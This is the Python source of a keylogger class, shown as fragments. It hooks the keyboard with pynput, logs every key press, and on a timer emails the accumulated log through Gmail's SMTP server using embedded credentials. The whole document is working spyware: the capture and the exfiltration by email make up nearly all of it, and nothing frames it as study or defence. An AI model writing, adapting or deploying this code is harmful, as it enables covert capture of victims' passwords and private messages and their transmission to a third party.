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pynput.keyboard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smtplib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Keylogger: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time_interval, email, password):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"KEYLOGGER STARTED"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self.interval = time_interval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self.email = email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self.password = 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append_to_log(self, string):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self.log + string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process_key_press(self, key):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current_key = str(key.char)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== key.space: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current_key = " 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current_key = " " + str(key) + "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self.append_to_log(current_key)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report(self):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self.send_mail(self.email, self.password, "\n\n" + self.log)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""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 = threading.Timer(self.interval, self.report)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timer.start()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send_mail(email, password, message):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= smtplib.SMTP("smtp.gmail.com", 587)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server.starttls()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server.login(email,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server.sendmail(email, email, message)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server.quit()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start(self):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keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)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keyboard_listener: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self.report()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keyboard_listener.join()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